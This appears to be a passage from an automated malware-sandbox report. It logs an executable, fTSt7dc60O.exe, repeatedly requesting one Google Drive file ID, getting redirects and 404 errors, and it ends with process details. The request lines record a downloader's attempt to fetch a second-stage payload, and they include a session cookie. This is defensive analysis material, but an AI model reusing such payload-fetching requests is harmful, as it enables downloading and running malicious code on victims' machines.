                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-90iwcmhoHxf74y5pcud6Cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:35 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 6d 6e 50 74 34 5a 45 75 49 72 4d 33 79 33 6d 34 70 43 76 4f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="fmnPt4ZEuIrM3y3m4pCvOQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    80192.168.2.752265172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:36 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:36 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:36 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-HdhV9dA9ykcnTNfoHDBh3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    81192.168.2.752266142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:37 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:37 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQhJzHgozB75gam0sM-sATueUkc-xiOce4FQxkww4vUwqrhlTNm0doDgK0_ngwFrbnt
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:37 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-7UH3_v7O71nzk3AW6Gnnxg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:37 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 78 41 68 41 6f 6e 4d 6c 65 5f 4f 35 2d 70 4b 5f 74 42 79 67 67 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="xAhAonMle_O5-pK_tByggA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    82192.168.2.752267172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:38 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:39 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:38 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-qFjxLtb6fcR8PU6dktDtXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    83192.168.2.752268142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:39 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:40 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC7Mvo9V69fHwQK2FW1Nm7173K1I8fBZLfKNAM4NzSb8bqdw8B1fab-0IM6WI9Gnr8kD
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:39 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-v6NbmKre5m67uHZkn0vfWw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:40 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 6f 49 72 54 71 34 73 35 31 33 78 58 39 4a 56 46 2d 71 56 6a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="noIrTq4s513xX9JVF-qVjw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    84192.168.2.752269172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:41 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:41 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:41 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-WNej71GuGrKaNXTCsovjuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    85192.168.2.752270142.250.186.1614434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:42 UTC459OUTGET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:42 UTC1844INHTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQl6mRH8Y8IaoWcTpfIUUHxBnug6OaSznTs70oW8RIncvHadVuhwXmnZlGGU91BTl1c
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:42 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-ybTtXvGGOtPWe8der0jKEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:40:42 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 77 5f 47 48 50 52 53 38 68 6d 57 39 73 78 63 77 5f 67 62 34 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ew_GHPRS8hmW9sxcw_gb4A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    86192.168.2.752271172.217.18.144434640C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    TimestampBytes transferredDirectionData
                                                    2025-01-10 14:40:43 UTC417OUTGET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:40:43 UTC1920INHTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:40:43 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-eWaK4ypKrgNCRHcYGXu3DQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:09:38:39
                                                    Start date:10/01/2025
                                                    Path:C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\fTSt7dc60O.exe"
                                                    Imagebase:0x400000
